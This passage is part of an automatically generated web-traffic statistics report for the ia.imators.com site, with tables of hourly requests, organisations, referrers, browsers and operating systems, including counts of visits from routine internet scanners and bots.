4</td><td class="R">35</td><td class="P">29</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 5</td><td class="R">43</td><td class="P">32</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 6</td><td class="R">57</td><td class="P">39</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 7</td><td class="R">46</td><td class="P">36</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x"> 8</td><td class="R">70</td><td class="P">57</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 9</td><td class="R">40</td><td class="P">34</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">10</td><td class="R">45</td><td class="P">43</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">11</td><td class="R">28</td><td class="P">28</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">12</td><td class="R">50</td><td class="P">42</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">13</td><td class="R">46</td><td class="P">44</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">14</td><td class="R">31</td><td class="P">31</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">15</td><td class="R">30</td><td class="P">22</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">16</td><td class="R">46</td><td class="P">34</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">17</td><td class="R">33</td><td class="P">20</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">18</td><td class="R">45</td><td class="P">38</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">19</td><td class="R">34</td><td class="P">26</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">20</td><td class="R">25</td><td class="P">23</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">21</td><td class="R">27</td><td class="P">20</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">22</td><td class="R">230</td><td class="P">105</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">23</td><td class="R">63</td><td class="P">46</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++" /></td></tr> </tbody></table> </div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing domains, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead> <tbody><tr><td class="R">1335</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr> </tbody></table> </div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./org.png" alt="" /></p> <p class="whatinc"> Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead> <tbody><tr><td class="R">86</td><td class="b"> 5.85%</td><td class="xl">205.169</td></tr> <tr><td class="R">78</td><td class="b"> 4.79%</td><td class="xl">34</td></tr> <tr><td class="R">67</td><td class="b"> 3.36%</td><td class="xl">104</td></tr> <tr><td class="R">62</td><td class="b">23.36%</td><td class="xl">20</td></tr> <tr><td class="R">58</td><td class="b"> 4.73%</td><td class="xl">198.235</td></tr> <tr><td class="R">54</td><td class="b"> 2.75%</td><td class="xl">47</td></tr> <tr><td class="R">47</td><td class="b"> 4.24%</td><td class="xl">205.210</td></tr> <tr><td class="R">45</td><td class="b"> 2.91%</td><td class="xl">35</td></tr> <tr><td class="R">40</td><td class="b"> 2.57%</td><td class="xl">3</td></tr> <tr><td class="R">39</td><td class="b"> 2.82%</td><td class="xl">54</td></tr> <tr><td class="R">32</td><td class="b"> 2.50%</td><td class="xl">45</td></tr> <tr><td class="R">30</td><td class="b"> 1.99%</td><td class="xl">123</td></tr> <tr><td class="R">30</td><td class="b"> 1.13%</td><td class="xl">167.94</td></tr> <tr><td class="R">21</td><td class="b"> 4.95%</td><td class="xl">106</td></tr> <tr><td class="R">18</td><td class="b"> 0.08%</td><td class="xl">194.87</td></tr> <tr><td class="R">16</td><td class="b"> 0.67%</td><td class="xl">18</td></tr> <tr><td class="R">15</td><td class="b"> 0.55%</td><td class="xl">206.168</td></tr> <tr><td class="R">15</td><td class="b"> 0.99%</td><td class="xl">27</td></tr> <tr><td class="R">14</td><td class="b"> 0.28%</td><td class="xl">195.211</td></tr> <tr><td class="R">13</td><td class="b"> 0.67%</td><td class="xl">51</td></tr> <tr><td class="R">555</td><td class="b">28.80%</td><td class="xl">[not listed: 135 organizations]</td></tr> </tbody></table> </div><div class="redirref"><h2><a name="redirref" id="redirref">Redirected Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Redirected Referrer Report | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing referring URLs, sorted by the number of redirected requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">1</td><td class="xl"><a href="http://www.ia.imators.com/cgi-bin">http://www.ia.imators.com/cgi-bin</a></td></tr> </tbody></table> </div><div class="failref"><h2><a name="failref" id="failref">Failed Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | Failed Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./failref.png" alt="" /></p> <p class="whatinc"> Listing referring URLs, sorted by the number of failed requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">82</td><td class="xl"><a href="http://www.ia.imators.com/">http://www.ia.imators.com/</a></td></tr> <tr><td class="R">63</td><td class="xl"><a href="https://www.google.com/">https://www.google.com/</a></td></tr> <tr><td class="R">33</td><td class="xl"><a href="http://ia.imators.com/">http://ia.imators.com/</a></td></tr> <tr><td class="R">20</td><td class="xl"><a href="https://www.ia.imators.com/">https://www.ia.imators.com/</a></td></tr> <tr><td class="R">7</td><td class="xl"><a href="https://ia.imators.com/">https://ia.imators.com/</a></td></tr> <tr><td class="R">5</td><td class="xl"><a href="https://www.i-conn.nl//wp-login.php">https://www.i-conn.nl//wp-login.php</a></td></tr> <tr><td class="R">5</td><td class="xl"><a href="https://ia-imaging.com//blog//wp-login.php">https://ia-imaging.com//blog//wp-login.php</a></td></tr> <tr><td class="R">2</td><td class="xl"><a href="www.google.comhttps://t.me/optimasprimetools">www.google.comhttps://t.me/optimasprimetools</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="http://www.ia.imators.com/cgi-bin">http://www.ia.imators.com/cgi-bin</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://www.ia.imators.com/cgi-bin/">https://www.ia.imators.com/cgi-bin/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="http://ia.imators.com/favicon.ico">http://ia.imators.com/favicon.ico</a></td></tr> </tbody></table> </div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./refsite.png" alt="" /></p> <p class="whatinc"> Listing referring sites, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead> <tbody><tr><td class="R">130</td><td class="xl">http://www.ia.imators.com/</td></tr> <tr><td class="R">53</td><td class="xl">http://ia.imators.com/</td></tr> <tr><td class="R">24</td><td class="xl">https://www.ia.imators.com/</td></tr> <tr><td class="R">9</td><td class="xl">https://www.google.com/</td></tr> <tr><td class="R">4</td><td class="xl">https://ia.imators.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://webdisk.birkenheaddrill.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.google.fr/</td></tr> <tr><td class="R">1</td><td class="xl">https://158.193.145.151/</td></tr> <tr><td class="R">1</td><td class="xl">http://www.kaylanicoledigitalmarketing.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://p7g6av7v.hongch.cn/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.gestionpl.ca/</td></tr> <tr><td class="R">1</td><td class="xl">https://27.6.173.252/</td></tr> <tr><td class="R">1</td><td class="xl">http://175.27.248.198/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.521qquu58.xyz/</td></tr> <tr><td class="R">1</td><td class="xl">http://uwcuapimanagement.configuration.azure-api.net/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.i-conn.nl/</td></tr> <tr><td class="R">1</td><td class="xl">https://ia-imaging.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://clatsopcomputersolutions.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://b.blog.davideramirez.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://194.87.217.15/</td></tr> <tr><td class="R">1</td><td class="xl">https://mail.mgbacgiang3s.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://parkerjconstruction.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://175.24.179.113/</td></tr> <tr><td class="R">1</td><td class="xl">http://b.wjui.net/</td></tr> <tr><td class="R">1</td><td class="xl">http://156.237.46.172/</td></tr> </tbody></table> </div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browrep.png" alt="" /></p> <p class="whatinc"> Listing the top 40 browsers by the number of requests for pages, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="R">66</td><td class="P">66</td><td class="xl">Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)</td></tr> <tr><td class="R">43</td><td class="P">43</td><td class="xl">Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com</td></tr> <tr><td class="R">62</td><td class="P">42</td><td class="xl">Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)</td></tr> <tr><td class="R">42</td><td class="P">42</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</td></tr> <tr><td class="R">37</td><td class="P">37</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36</td></tr> <tr><td class="R">36</td><td class="P">36</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36</td></tr> <tr><td class="R">32</td><td class="P">32</td><td class="xl">Mozilla/5.0 (compatible)</td></tr> <tr><td class="R">30</td><td class="P">30</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43</td></tr> <tr><td class="R">25</td><td class="P">25</td><td class="xl">Mozilla/5.0 \\(Windows NT 10.0\\; Win64\\; x64\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Chrome/100.0.4896.60 Safari/537.36</td></tr> <tr><td class="R">28</td><td class="P">24</td><td class="xl">Go-http-client/1.1</td></tr> <tr><td class="R">22</td><td class="P">22</td><td class="xl">Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0</td></tr> <tr><td class="R">21</td><td class="P">21</td><td class="xl">Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)</td></tr> <tr><td class="R">19</td><td class="P">19</td><td class="xl">Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)</td></tr> <tr><td class="R">16</td><td class="P">16</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11</td></tr> <tr><td class="R">16</td><td class="P">16</td><td class="xl">Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)</td></tr> <tr><td class="R">14</td><td class="P">14</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36</td></tr> <tr><td class="R">13</td><td class="P">13</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0</td></tr> <tr><td class="R">13</td><td class="P">13</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36</td></tr> <tr><td class="R">12</td><td class="P">12</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3</td></tr> <tr><td class="R">47</td><td class="P">10</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36</td></tr> <tr><td class="R">16</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.4a) Gecko/20030401</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 (scanner.ducks.party)</td></tr> <tr><td class="R">7</td><td class="P">7</td><td class="xl">Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36</td></tr> <tr><td class="R">7</td><td class="P">7</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36</td></tr> <tr><td class="R">30</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Linux; U; Android 8.1.0; zh-cn; MI 8 Build/OPM1.171019.011) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 Mobile Safari/537.36</td></tr> <tr><td class="R">14</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (compatible; wpbot/1.1; +https://forms.gle/ajBaxygz9jSR8p8G9)</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0</td></tr> <tr><td class="R">18</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">curl/7.61.1</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36</td></tr> <tr><td class="R">28</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 zgrab/0.x</td></tr> <tr><td class="R">14</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0</td></tr> <tr><td class="R">11</td><td class="P">5</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.2; rb.gy/oupwis) Chrome/124.0.0.0 Safari/537.36</td></tr> <tr><td class="R">12</td><td class="P">5</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0</td></tr> <tr><td class="R">5</td><td class="P">5</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0</td></tr> <tr><td class="R">431</td><td class="P">186</td><td class="xl">[not listed: 189 browsers]</td></tr> </tbody></table> </div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browsum.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">692</td><td class="P">436</td><td class="xl">Safari</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">643</td><td class="P">409</td><td class="xl"> Safari/537</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">16</td><td class="P">16</td><td class="xl"> Safari/535</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">20</td><td class="P">7</td><td class="xl"> Safari/604</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">2</td><td class="xl"> Safari/605</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">2</td><td class="xl"> Safari/534</td></tr> <tr><td class="N">2</td><td class="R">282</td><td class="P">217</td><td class="xl">Netscape (compatible)</td></tr> <tr><td class="N">3</td><td class="R">77</td><td class="P">64</td><td class="xl">Firefox</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">28</td><td class="P">24</td><td class="xl"> Firefox/120</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">6</td><td class="P">6</td><td class="xl"> Firefox/122</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">6</td><td class="P">6</td><td class="xl"> Firefox/137</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">5</td><td class="xl"> Firefox/136</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">5</td><td class="xl"> Firefox/139</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> Firefox/126</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">3</td><td class="P">3</td><td class="xl"> Firefox/130</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/62</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/83</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/134</td></tr> <tr><td class="N">4</td><td class="R">43</td><td class="P">43</td><td class="xl">Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">43</td><td class="P">43</td><td class="xl"> Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains</td></tr> <tr><td class="N">5</td><td class="R">54</td><td class="P">34</td><td class="xl">Mozilla</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">17</td><td class="P">12</td><td class="xl"> Mozilla/1</td></tr> <tr><td class="N">6</td><td class="R">28</td><td class="P">24</td><td class="xl">Go-http-client</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">28</td><td class="P">24</td><td class="xl"> Go-http-client/1</td></tr> <tr><td class="N">7</td><td class="R">10</td><td class="P">10</td><td class="xl">curl</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">10</td><td class="P">10</td><td class="xl"> curl/7</td></tr> <tr><td class="N">8</td><td class="R">5</td><td class="P">5</td><td class="xl">Hello from Palo Alto Networks, find out more about our scans in https:</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">5</td><td class="xl"> Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex</td></tr> <tr><td class="N">9</td><td class="R">4</td><td class="P">4</td><td class="xl">WanScannerBot</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> WanScannerBot/1</td></tr> <tr><td class="N">10</td><td class="R">3</td><td class="P">3</td><td class="xl">python-requests</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">3</td><td class="P">3</td><td class="xl"> python-requests/2</td></tr> <tr><td class="N">11</td><td class="R">5</td><td class="P">3</td><td class="xl">MSIE</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> MSIE/7</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">1</td><td class="xl"> MSIE/9</td></tr> <tr><td class="N">12</td><td class="R">4</td><td class="P">1</td><td class="xl">googlebot</td></tr> <tr><td class="N">13</td><td class="R">11</td><td class="P">1</td><td class="xl">python-httpx</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">11</td><td class="P">1</td><td class="xl"> python-httpx/0</td></tr> <tr><td class="N">14</td><td class="R">1</td><td class="P">1</td><td class="xl">BlackBerry8320</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> BlackBerry8320/4</td></tr> <tr><td class="N"> </td><td class="R">28</td><td class="P">0</td><td class="xl">[not listed: 9 browsers]</td></tr> </tbody></table> </div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./os.png" alt="" /></p> <p class="whatinc"> Listing operating systems, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">425</td><td class="P">317</td><td class="xl">OS unknown</td></tr> <tr><td class="N">2</td><td class="R">430</td><td class="P">272</td><td class="xl">Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">370</td><td class="P">250</td><td class="xl"> Windows NT</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">53</td><td class="P">20</td><td class="xl"> Unknown Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Windows 2000</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">1</td><td class="xl"> Windows XP</td></tr> 